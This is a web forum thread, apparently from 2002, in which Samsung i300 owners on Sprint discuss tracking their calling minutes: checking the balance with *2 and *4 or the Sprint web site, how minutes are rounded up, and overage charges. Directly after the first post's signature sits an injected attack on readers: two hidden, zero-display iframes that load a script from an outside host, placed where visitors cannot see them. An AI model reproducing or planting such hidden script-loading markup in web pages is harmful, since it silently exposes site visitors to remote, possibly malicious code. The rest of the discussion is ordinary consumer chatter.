+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

minute-monitoring software?

Does anyone know of installable software to give usage stats on minutes used for calling? Specifically peak vs off-peak times, etc?

thanks!
    bryan
    bryanchains@yahoo.com<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

not that i know of...

you can always use the "sprint web" browser and check your minutes... yeah you gotta connect to the web, but it will beat any counter app available... (or you could just call *4 which is a free call...)

i know a guy that made a counter for the 6035... it used the call list db to calculate the minutes used... very good app, but i dont think our phone has a long enough call list for that program to work.. (i.e. wont record enough calls in the db to make a good reference for the app).

i dont particularly need a minute counter program, as i stated above.. you can call to check your minutes (free) or connect to the sprints web with the "sprint web" app and slecelct "@sprintpcs"... :p

I'd love to have an app that tracks call time as well. You'll have to excuse Marc. He keeps forgetting that the I300 should be able to do everything!

Anyone found the call duration or total talk time features yet?

I cant believe the i300 times your calls and does not at least record this time in the in coming and out going logs.

I wonder if Sprint had some inout on that one?

The problem with *4 is that it is not very fast and may not allways accurate. (if you just made a call, changed your plan, added plan features, are wearing blue socks etc. as the recording says)

Administrator

Arrow

*4 is always on pont for me whenever i have used it... i mean.. one minute after making a phone call dont expect the system to have your plan updated!! yeah it will take maybe 30 minutes MAX (10-20 is more on the point) , but whats 30 minutes gonna matter? if you looked at a minute counter, you would have a much better chance of getting a false total...

i aggree that its sad the samsung phone does not have the calls logged as well as the 6035, but i think thats more of a samsung thing than sprint, because as i just said the 6035 had this ability and a guy even made a counter app for the phone.. which was a pretty damn good app!

bottom line: get enuff minutes and you wont have to worry about it!

What is Tennis referring to when he says the I300 times your calls?

The LCD and phone screen both keep track of your call length while your on the phone. (Look at the LCD or display while your taking to somebody) This info is just ignored after you hang up. Samsung was 99.9% there.

Well certainly they keep track of call times as I imagine all phones do. My previous samsung did those while only tracking the call length from the last call, and also providing total talk time and monthly talk time. I can't believe that function was omitted from the device. However, its really not that big a deal for me. I just check online. As much as I visit the wireless web now, theres nothing I could say that negates me having the time to check my minutes while using.

Sounds like you guys might have big minute plans. I signed up for the 200-minute deal, to evaluate if it would fulfill my needs. The plan seemed to work, but I canceled within 14 days anyway. Right now I’m paying the extra $10 per month to have no contract. This is what messed up my *4 and web reports.

Should I continue with this for a couple of months and gamble that Sprint might offer a better package after Jan 1. The 200-minute deal expires Dec 31? I would think Verizon might be a future possibly as well. They might cover my area a little better. Any advice? I mainly use the phone for connectivity to work for off-hour (limited) support, short daytime conversations, and convenience calling. Again, if I watched my minutes, the 200-minute plan would probably work.

Sorry if this is off subject bchains, but it kinda exemplifies why a minute counting app would help me out a lot.

How many off peak minutes do you have? If a good amount, why not check minutes after 9 or on the weekend?

2800. I do check minutes on off-peak or even from my PC quite a bit.

The ideal minute app should take your plan as input, deduct minutes as you make calls, and display the totals of what you have left. I'd be happy with anything though. Actually I'm happy with i300 as is, it just seems a lot of requested features (like this one) would not be that hard for Samsung (or others with a SDK) to implement.

I agree. What I forgot last month when I had all those overage minutes was that the minutes are rounded up instead of counted by the second.

A number of years ago, I know that Sprint offered the first minute of incoming calls for free. Is this still the case?

Administrator

Arrow

minute apps are cool, but for you guys out there who have soft resets and such all the time,, it could make the app un reliable... :p
    Last edited by Marctronixx; 03-16-2002 at 04:04 PM.

*2 & *4 don't use your minutes!!

Originally posted by mjorange
    How many off peak minutes do you have? If a good amount, why not check minutes after 9 or on the weekend?

*2 & *4 don't use your minutes!!:o

Question Minute/Plan Timer

I know I must be missing something, but I have done a search and can find no minute timer to track monthly use by peak/off peak. Is there one?

Administrator

Arrow

there is not one made for the i300...

yu can do *2 or go to sprints WAP for the latest.. those options are tons more accurate than any crash-prone minute counter app ..

Re: *2 & *4 don't use your minutes!!

Originally posted by lizardhowson

*2 & *4 don't use your minutes!!:o
    They don't use your minutes but my old StarTac would count them as minutes used on the phone. (Which I always thought was a useless featuter for 2 reasons: It didn't seprate peak from of peak and it counted the time even if no one answered. Actually I'll make that 3 reasons: operated assited and information gets counted differently, doesn't it?).

My 1/2 cent,
    Gary

Those defecits are balanced by the fact that your minutes are rounded up. The gauges on the phone are useless in my opinion. The most accurate approach to determining minute usage is the website.

Sprint minutes system is completely unreliable

This is the second month that I have been burned by over $75 in additional charges by relying on their stupid tracking system.

In looking at my bill it was over 5 days late in tracking - I began going over my minutes with about 25% of my billing period left.

Sorry, that is unacceptable, and after talking with customer support and getting no where on the topic other than - Our system is 99% accurate yet we take no responsibility for it being wrong, is even more irritating.

I will be switching to the Verizon service for the phone when it becomes available.

I would love to have an app that tracks the time that way at least if it is wrong I have control of knowing it is my fault. Right now I have no reliable source for tracking this and Sprint takes no responsibility for the issue.

For those that think the *4 function works sufficiently, I doubt they have been burned by it yet. But you will, trust me you will.